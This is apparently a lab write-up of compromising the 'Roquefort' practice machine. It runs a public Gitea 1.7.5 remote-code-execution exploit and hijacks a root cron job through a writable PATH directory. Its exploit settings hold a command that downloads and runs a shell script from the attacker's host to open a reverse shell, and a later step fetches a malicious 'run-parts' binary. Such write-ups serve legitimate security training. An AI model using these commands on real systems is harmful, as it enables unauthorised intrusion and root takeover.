Roquefort

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.157.67 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:40 +08
Nmap scan report for 192.168.157.67
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   open   ssh
2222/tcp open   EtherNetIP-1
3000/tcp open   ppp

FTP does not allow for anonymous logins.

Web Enum -> Gitea RCE

Only port 3000 has a webpage:

In the bottom left, we can see the version, which is vulnerable to RCE:

$ searchsploit gitea 1.7.5
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Gitea 1.7.5 - Remote Code Execution                        | multiple/webapps/49383.py
----------------------------------------------------------- ---------------------------------

We can create any account, and then use these settings:

USERNAME = "test123"
PASSWORD = "test123"
HOST_ADDR = '192.168.45.196'
HOST_PORT = 3000
URL = 'http://192.168.157.67:3000'
CMD = 'wget http://192.168.45.196:21/shell.sh && bash shell.sh'

We would then get a reverse shell:

Privilege Escalation

Cronjob Path -> Root

linpeas.sh picked up that we can write to the Systemd PATH:

This means we just need to find some process from root that doesn't use the full PATH. I used pspy64 to find such a process.

2023/07/15 22:55:01 CMD: UID=0    PID=13493  | run-parts --report /etc/cron.hourly

run-parts should work.

chloe@roquefort:/tmp$ which run-parts
/bin/run-parts

Since the /bin directory is the last in PATH, we can place our malicious binary within /usr/local/bin to be executed first.

cd /usr/local/bin
wget 192.168.45.196:21/run-parts
chmod 777 run-parts

Then, start a listener port and wait for root to execute the binary:

PreviousReconstruction NextSirol

Last updated 1 year ago